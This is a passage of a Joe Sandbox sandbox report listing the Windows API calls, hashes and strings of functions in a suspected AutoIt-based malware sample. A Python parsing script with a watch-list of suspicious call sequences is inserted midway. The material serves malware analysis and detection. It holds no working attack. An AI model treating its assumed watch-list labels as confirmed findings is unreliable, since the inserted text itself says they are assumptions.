                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorLastacceptselect
                                                • String ID:
                                                • API String ID: 385091864-0
                                                • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                • GetStockObject.GDI32(00000011), ref: 00430258
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                • String ID:
                                                • API String ID: 1358664141-0
                                                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                • String ID:
                                                • API String ID: 2880819207-0
                                                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 0043392E
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • __wsplitpath.LIBCMT ref: 00433950
                                                • __wcsicoll.LIBCMT ref: 00433974
                                                • __wcsicoll.LIBCMT ref: 0043398A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                • String ID:
                                                • API String ID: 1187119602-0
                                                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                APIs
                                                Similarity
                                                • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                • String ID:
                                                • API String ID: 1597257046-0
                                                • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                • __malloc_crt.LIBCMT ref: 0041F5B6
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                Similarity
                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                • String ID:
                                                • API String ID: 237123855-0
                                                • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                APIs
                                                Similarity
                                                • API ID: DeleteDestroyObject$IconWindow
                                                • String ID:
                                                • API String ID: 3349847261-0
                                                • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                Similarity
                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                • String ID:
                                                • API String ID: 2223660684-0
                                                • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                APIs
                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                • LineTo.GDI32(?,?,?), ref: 00447326
                                                • EndPath.GDI32(?), ref: 00447336
                                                • StrokePath.GDI32(?), ref: 00447344
                                                Similarity
                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                • String ID:
                                                • API String ID: 2783949968-0
                                                • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
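The entries on this page are per-function API call listings as Joe Sandbox's IDA plugin emits them: direct calls in listing order, calls made from subroutines marked "Part of subcall function", each with its call-site address, and a Similarity "API ID" that is the only API information left when an entry's own call list is empty. The Python script below is added here as an example; it is not part of the Joe Sandbox report or its tooling. It parses that text into per-function call sequences, recovers the call-site address range so the function can be located in IDA (the listing never names the function), and checks each sequence against a small watch-list of ordered API subsequences. The SAMPLE text is constructed from three entries of this report; WATCH_SEQUENCES and its labels are an analyst's assumption about which sequences merit a closer look (for instance GetWindowThreadProcessId followed by GetCurrentThreadId and AttachThreadInput, the sequence used to attach the calling thread's input queue to another window's thread), not a claim the report itself makes.

```python
"""Parse Joe Sandbox-style per-function API listings into call sequences.

Added example, not part of the Joe Sandbox report or its tooling. SAMPLE is
constructed from entries of the report; WATCH_SEQUENCES is an analyst
assumption about which ordered API subsequences deserve a closer look.
"""
import re

# One call line, in either shape the listing uses, optionally prefixed by
# "Part of subcall function XXXXXXXX:":
#   • AttachThreadInput.USER32(00000000), ref: 004364AA
#   • GetCurrentThreadId.KERNEL32 ref: 004364A3        (no argument list)
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# The Similarity block's "API ID" line (e.g. "• API ID: Thread$Attach...").
_API_ID_RE = re.compile(r"^\s*•\s*API ID:\s*(?P<ids>\S.*)?$")

# Constructed sample: lines copied from three entries of the report above.
SAMPLE = """\
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
• GetCurrentThreadId.KERNEL32 ref: 004364A3
• AttachThreadInput.USER32(00000000), ref: 004364AA
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
APIs
Similarity
• API ID: _wcslen$_malloc_wcscat_wcscpy
"""

# Analyst watch-list (assumption): ordered subsequences of a function's
# direct calls that are worth a second look in a sample like this one.
WATCH_SEQUENCES = {
    "attach-input-queue-to-foreign-thread":
        ("GetWindowThreadProcessId", "GetCurrentThreadId", "AttachThreadInput"),
    "wait-then-unload-user-profile":
        ("WaitForSingleObject", "UnloadUserProfile", "CloseHandle"),
}


def parse_api_listing(text):
    """Return one dict per "APIs" section, in report order.

    direct   : [(api, module, call_site), ...] in listing order
    subcalls : {subroutine_addr: [(api, module, call_site), ...]}
    api_id   : the Similarity "API ID" string, or "" if absent
    """
    entries, current = [], None
    for raw in text.splitlines():
        if raw.strip() == "APIs":          # every entry starts with this header
            current = {"direct": [], "subcalls": {}, "api_id": ""}
            entries.append(current)
            continue
        if current is None:
            continue
        m = _CALL_RE.match(raw)
        if m:
            call = (m.group("api"), m.group("module").upper(), int(m.group("ref"), 16))
            if m.group("sub"):
                current["subcalls"].setdefault(int(m.group("sub"), 16), []).append(call)
            else:
                current["direct"].append(call)
            continue
        m = _API_ID_RE.match(raw)
        if m:
            current["api_id"] = (m.group("ids") or "").strip()
    return entries


def function_range(entry):
    """Lowest and highest direct call-site address, or None without direct calls."""
    sites = [site for _, _, site in entry["direct"]]
    return (min(sites), max(sites)) if sites else None


def contains_subsequence(names, pattern):
    """True if pattern occurs in names in order (gaps allowed)."""
    it = iter(names)
    return all(any(n == p for n in it) for p in pattern)


def flag_entries(entries):
    """Return (entry_index, label) for every watch-list sequence found."""
    hits = []
    for idx, entry in enumerate(entries):
        names = [api for api, _, _ in entry["direct"]]
        for label, pattern in WATCH_SEQUENCES.items():
            if contains_subsequence(names, pattern):
                hits.append((idx, label))
    return hits


if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    for i, e in enumerate(parsed):
        rng = function_range(e)
        where = "%08X-%08X" % rng if rng else "no direct calls"
        print(i, where, [a for a, _, _ in e["direct"]] or e["api_id"])
    for idx, label in flag_entries(parsed):
        print("flag: entry %d: %s" % (idx, label))
```

To run it over a whole report, replace SAMPLE with the text copied from the page; only lines of the two call shapes and the "API ID" line are consumed, so the Memory Dump Source, Similarity hash and snapshot lines are ignored. Subcall entries are kept separate from direct calls on purpose: the watch-list matches direct calls only, because a subroutine's calls are reported under every caller and would otherwise be counted once per caller.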
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 00472B63
                                                • GetDC.USER32(00000000), ref: 00472B6C
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 00472BB2
                                                • GetDC.USER32(00000000), ref: 00472BBB
                                                • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                APIs
                                                • __getptd_noexit.LIBCMT ref: 00415150
                                                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                • __freeptd.LIBCMT ref: 0041516B
                                                • ExitThread.KERNEL32 ref: 00415173
                                                Similarity
                                                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                • String ID:
                                                • API String ID: 1454798553-0
                                                • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _strncmp
                                                • String ID: Q\E
                                                • API String ID: 909875538-2189900498
                                                • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                APIs
                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                Strings
                                                Similarity
                                                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                • String ID: AutoIt3GUI$Container
                                                • API String ID: 2652923123-3941886329
                                                • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _memmove_strncmp
                                                • String ID: U$\
                                                • API String ID: 2666721431-100911408
                                                • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                APIs
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • __wcsnicmp.LIBCMT ref: 00467288
                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                Strings
                                                Similarity
                                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                • String ID: LPT
                                                • API String ID: 3035604524-1350329615
                                                • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \$h
                                                • API String ID: 4104443479-677774858
                                                • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID: &
                                                • API String ID: 2931989736-1010288
                                                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: \
                                                • API String ID: 4104443479-2967466578
